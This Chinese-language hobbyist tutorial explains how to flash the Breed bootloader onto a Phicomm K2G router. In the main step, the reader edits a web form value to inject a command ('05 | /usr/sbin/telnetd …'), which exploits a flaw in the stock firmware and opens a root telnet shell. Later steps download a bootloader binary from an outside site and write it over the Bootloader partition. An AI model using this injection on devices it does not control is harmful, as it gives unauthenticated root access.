斐讯K2G开telnet刷Breed教程

斐讯K2G路由器想要刷入第三方固件就得先刷入Breed，这样才不会因为刷入固件失败或者有问题导致路由器变砖，下面就是教大家怎么开telnet刷Breed教程，例子使用的是硬件是K2G A1版本，固件版本号为22.6.3.20。

1、刷breed的思路，和K2、K2P大致一样，都是先利用各种漏洞或者工具开telnet，然后下载breed包，最后刷入breed并重启。
那么在这里第一步，就是利用默认固件的WEB漏洞，进行命令注入。
2、还是老样子，经过简单的开局配置后进入（保证路由器能够访问互联网） 高级设置-系统设置-自动升级-自定义升级时间：开启
看到小时和分钟的下拉菜单，小时不用管 分钟选择5分钟。
3、右键点击选择的分钟数，点审查元素（有的浏览器叫做 检查），如果右键被锁，无法调取右键菜单请按F12
4、下面一步就是利用命令注入漏洞的关键一步！把value框内原来的05改为如下内容（如果你选择的其他分钟数也以此类推自己判断），怕打错就复制粘贴，前后没有空格，中间的空格一个都不要丢哈。

05 | /usr/sbin/telnetd -l /bin/login.sh

5、然后选择一下其他分钟数，再点回来，确认value内的值没有丢失。然后点击保存！
如果没有问题，telnet就已经打开了。这就是我们最精髓的一步！开了telnet我们就可以做一切我们想做的操作了。
6、为了回显结果更加直观，我在这里选择使用telnet继续操作。
选择使用telnet的童鞋们，请继续跟着做第二步，按win徽标键+R，调出运行对话框 输入cmd，然后确定，打开命令提示符。
在命令提示符中输入telnet 192.168.2.1 （没用过telnet的电脑尤其WIN7以后的需要打开telnet客户端功能才能继续，否则报错，打开telnet方法自行百度）
7、在#号后输入cd /tmp 回车，切换到tmp目录，（进行以下操作前请确定路由器已经联网，验证方法：LAN口用户可以上网）
然后在root@K2G:/tmp#后输入 wget http://down.freenn.com/file/gujian/breed-mt7620-phicomm-psg1208.bin
等待下载完成
出现breed-mt7620-phicomm 100% |*| 91121 0:00:00 ETA 字样才算完成。
8、第三步当然就是刷入breed了，在刷之前，先在root@K2G:/tmp#后输入mtd unlock Bootloader回车
收到如下回复
Unlocking Bootloader ...
然后在root@K2G:/tmp#后输入mtd -r write breed-mt7620-phicomm-psg1208.bin Bootloader并回车，开始刷breed。
收到如下回复
Unlocking Bootloader ...
Writing from breed-mt7620-phicomm-psg1208.bin to Bootloader ...
Rebooting ...
然后等待路由器重启，breed就已经被刷入了。
9、进入Breed方法：
拔下K2G上Wan口的网线（避免和前端的光猫等设备IP地址冲突），路由器断电，持续按住路由器上的reset按钮，接通路由器电源，待路由器上电后3-5秒后松开reset按钮。
在浏览器地址栏输入“http://192.168.1.1”访问Breed Web。